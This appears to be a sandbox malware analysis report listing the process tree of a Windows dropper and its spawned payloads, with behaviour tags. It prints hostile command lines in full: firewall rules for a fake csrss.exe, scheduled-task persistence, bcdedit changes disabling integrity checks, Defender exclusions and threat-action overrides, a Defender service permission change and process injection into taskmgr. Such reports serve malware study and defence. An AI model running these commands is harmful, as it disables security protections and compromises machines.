a3d607292f456d782622bdf10ddcaa72.exeinstallutil.exek7mJBhljBXiRSGrvpUPB8cSR.exeafCO4RNNOdc8dre3EnIRbez8.exeauK8VZaRDVFWuHg35HoY616s.execmd.execmd.exerun.exedescription pid process target process PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 3060 2232 a3d607292f456d782622bdf10ddcaa72.exe installutil.exe PID 2232 wrote to memory of 2704 2232 a3d607292f456d782622bdf10ddcaa72.exe WerFault.exe PID 2232 wrote to memory of 2704 2232 a3d607292f456d782622bdf10ddcaa72.exe WerFault.exe PID 2232 wrote to memory of 2704 2232 a3d607292f456d782622bdf10ddcaa72.exe WerFault.exe PID 3060 wrote to memory of 2228 3060 installutil.exe k7mJBhljBXiRSGrvpUPB8cSR.exe PID 3060 wrote to memory of 2228 3060 installutil.exe k7mJBhljBXiRSGrvpUPB8cSR.exe PID 3060 wrote to memory of 2228 3060 installutil.exe k7mJBhljBXiRSGrvpUPB8cSR.exe PID 3060 wrote to memory of 2228 3060 installutil.exe k7mJBhljBXiRSGrvpUPB8cSR.exe PID 3060 wrote to memory of 1684 3060 installutil.exe afCO4RNNOdc8dre3EnIRbez8.exe PID 3060 wrote to memory of 1684 3060 installutil.exe afCO4RNNOdc8dre3EnIRbez8.exe PID 3060 wrote to memory of 1684 3060 installutil.exe afCO4RNNOdc8dre3EnIRbez8.exe PID 3060 wrote to memory of 1684 3060 installutil.exe afCO4RNNOdc8dre3EnIRbez8.exe PID 3060 wrote to memory of 448 3060 installutil.exe auK8VZaRDVFWuHg35HoY616s.exe PID 3060 wrote to memory of 448 3060 installutil.exe auK8VZaRDVFWuHg35HoY616s.exe PID 3060 wrote to memory of 448 3060 installutil.exe auK8VZaRDVFWuHg35HoY616s.exe PID 3060 wrote to memory of 448 3060 installutil.exe auK8VZaRDVFWuHg35HoY616s.exe PID 2228 wrote to memory of 772 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe u1pw.0.exe PID 2228 wrote to memory of 772 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe u1pw.0.exe PID 2228 wrote to memory of 772 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe u1pw.0.exe PID 2228 wrote to memory of 772 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe u1pw.0.exe PID 3004 wrote to memory of 2444 3004 afCO4RNNOdc8dre3EnIRbez8.exe cmd.exe PID 3004 wrote to memory of 2444 3004 afCO4RNNOdc8dre3EnIRbez8.exe cmd.exe PID 3004 wrote to memory of 2444 3004 afCO4RNNOdc8dre3EnIRbez8.exe cmd.exe PID 3004 wrote to memory of 2444 3004 afCO4RNNOdc8dre3EnIRbez8.exe cmd.exe PID 2580 wrote to memory of 2504 2580 auK8VZaRDVFWuHg35HoY616s.exe cmd.exe PID 2580 wrote to memory of 2504 2580 auK8VZaRDVFWuHg35HoY616s.exe cmd.exe PID 2580 wrote to memory of 2504 2580 auK8VZaRDVFWuHg35HoY616s.exe cmd.exe PID 2580 wrote to memory of 2504 2580 auK8VZaRDVFWuHg35HoY616s.exe cmd.exe PID 2504 wrote to memory of 2052 2504 cmd.exe netsh.exe PID 2504 wrote to memory of 2052 2504 cmd.exe netsh.exe PID 2504 wrote to memory of 2052 2504 cmd.exe netsh.exe PID 3060 wrote to memory of 240 3060 installutil.exe gYvBj1ZGfOqJfVDf4rLNtsmi.exe PID 3060 wrote to memory of 240 3060 installutil.exe gYvBj1ZGfOqJfVDf4rLNtsmi.exe PID 3060 wrote to memory of 240 3060 installutil.exe gYvBj1ZGfOqJfVDf4rLNtsmi.exe PID 3060 wrote to memory of 240 3060 installutil.exe gYvBj1ZGfOqJfVDf4rLNtsmi.exe PID 2444 wrote to memory of 2772 2444 cmd.exe cmd.exe PID 2444 wrote to memory of 2772 2444 cmd.exe cmd.exe PID 2444 wrote to memory of 2772 2444 cmd.exe cmd.exe PID 2580 wrote to memory of 1824 2580 auK8VZaRDVFWuHg35HoY616s.exe csrss.exe PID 2580 wrote to memory of 1824 2580 auK8VZaRDVFWuHg35HoY616s.exe csrss.exe PID 2580 wrote to memory of 1824 2580 auK8VZaRDVFWuHg35HoY616s.exe csrss.exe PID 2580 wrote to memory of 1824 2580 auK8VZaRDVFWuHg35HoY616s.exe csrss.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 2228 wrote to memory of 1084 2228 k7mJBhljBXiRSGrvpUPB8cSR.exe run.exe PID 1084 wrote to memory of 1400 1084 run.exe cmd.exe PID 1084 wrote to memory of 1400 1084 run.exe cmd.exe PID 1084 wrote to memory of 1400 1084 run.exe cmd.exe PID 1084 wrote to memory of 1400 1084 run.exe cmd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3d607292f456d782622bdf10ddcaa72.exe"C:\Users\Admin\AppData\Local\Temp\a3d607292f456d782622bdf10ddcaa72.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\Pictures\k7mJBhljBXiRSGrvpUPB8cSR.exe"C:\Users\Admin\Pictures\k7mJBhljBXiRSGrvpUPB8cSR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\u1pw.0.exe"C:\Users\Admin\AppData\Local\Temp\u1pw.0.exe"4⤵
- Executes dropped EXE
PID:772 -
C:\Users\Admin\AppData\Local\Temp\u1pw.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u1pw.2\run.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1620 -
C:\Users\Admin\AppData\Local\Temp\u1pw.3.exe"C:\Users\Admin\AppData\Local\Temp\u1pw.3.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Users\Admin\Pictures\afCO4RNNOdc8dre3EnIRbez8.exe"C:\Users\Admin\Pictures\afCO4RNNOdc8dre3EnIRbez8.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Users\Admin\Pictures\afCO4RNNOdc8dre3EnIRbez8.exe"C:\Users\Admin\Pictures\afCO4RNNOdc8dre3EnIRbez8.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2772 -
C:\Users\Admin\Pictures\auK8VZaRDVFWuHg35HoY616s.exe"C:\Users\Admin\Pictures\auK8VZaRDVFWuHg35HoY616s.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448 -
C:\Users\Admin\Pictures\auK8VZaRDVFWuHg35HoY616s.exe"C:\Users\Admin\Pictures\auK8VZaRDVFWuHg35HoY616s.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2052 -
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1824 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3044 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2040 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2952 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:2632 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1752 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:2652 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2480 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2252 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:1700 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:2668 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:1488 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:964 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:3036 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:2320 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2864 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:1316 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:2648 -
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:1012 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1352
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:2696 -
C:\Users\Admin\Pictures\gYvBj1ZGfOqJfVDf4rLNtsmi.exe"C:\Users\Admin\Pictures\gYvBj1ZGfOqJfVDf4rLNtsmi.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:240 -
C:\Users\Admin\Pictures\rPKbVNKgudVWGiyJmJUEErrb.exe"C:\Users\Admin\Pictures\rPKbVNKgudVWGiyJmJUEErrb.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\7zS9FB9.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
PID:564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:1148
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:2872
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2092
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:2788
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:2240
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2772
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:2168
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:1892
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:1136
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:912
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:1280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:1832
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:1800
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵PID:1880
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵PID:1980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2016 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵PID:2784
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵PID:2608
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵PID:2804
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 09:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\PbVgkoeGEfQyDQK\OOoMkQq.exe\" Wt /eZwdidIFua 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1224 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"5⤵PID:1900
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt6⤵PID:1892
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt7⤵PID:1632
-
C:\Users\Admin\Pictures\qwCtI4Kyl1Iuhg35GaiEEDLr.exe"C:\Users\Admin\Pictures\qwCtI4Kyl1Iuhg35GaiEEDLr.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1700 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe4⤵
- Executes dropped EXE
PID:1640 -
C:\Windows\system32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"5⤵PID:556
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"5⤵PID:1164
-
C:\Users\Admin\Pictures\j4fTPrgQC2dZNL0OS3Ox0Owy.exe"C:\Users\Admin\Pictures\j4fTPrgQC2dZNL0OS3Ox0Owy.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\7zS781D.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
PID:1456 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2300
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵PID:1164
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:1180
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵PID:1752
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵PID:2976
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2552
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:2200
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵PID:1896
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:324
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵PID:1580
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵PID:1356
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:1092
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:1364
-
